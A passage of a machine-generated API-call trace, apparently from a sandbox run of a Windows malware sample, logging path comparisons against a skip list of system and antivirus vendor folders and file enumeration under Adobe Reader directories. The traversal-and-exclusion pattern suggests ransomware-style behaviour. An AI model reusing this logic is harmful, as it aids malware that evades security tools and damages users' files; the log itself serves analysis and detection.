cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.447] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.447] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.448] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.448] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0058.449] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.449] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0058.450] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.450] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0058.450] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.450] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0058.450] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.450] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0058.450] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.450] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0058.450] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\EU_ES\\") returned 0x3d [0058.450] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0058.450] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x833608a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.453] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.454] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.454] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.454] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d723420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82fce7a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.456] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.457] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.458] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.458] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82f824e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82f824e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.460] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fe3480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fe3480, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.461] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.461] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.461] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832ee480, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832ee480, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.463] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.464] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.464] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.464] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832c8320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.467] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x832a21c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.HUN", cAlternateFileName="READOU~1.HUN")) returned 1 [0058.467] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db017e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.HUN", cAlternateFileName="")) returned 1 [0058.467] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dadb680, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.HUN", cAlternateFileName="SAVEAS~1.HUN")) returned 1 [0058.467] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831e3ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.HUN", cAlternateFileName="")) returned 1 [0058.467] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831e3ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.HUN", cAlternateFileName="")) returned 1 [0058.467] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.467] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.468] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.468] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9598, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.468] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.468] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.468] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.468] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dfea540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.HUN", cAlternateFileName="")) returned 1 [0058.468] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f5309e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.HUN", cAlternateFileName="")) returned 1 [0058.468] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831e3ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="WebLink.HUN", cAlternateFileName="")) returned 1 [0058.468] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831e3ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, 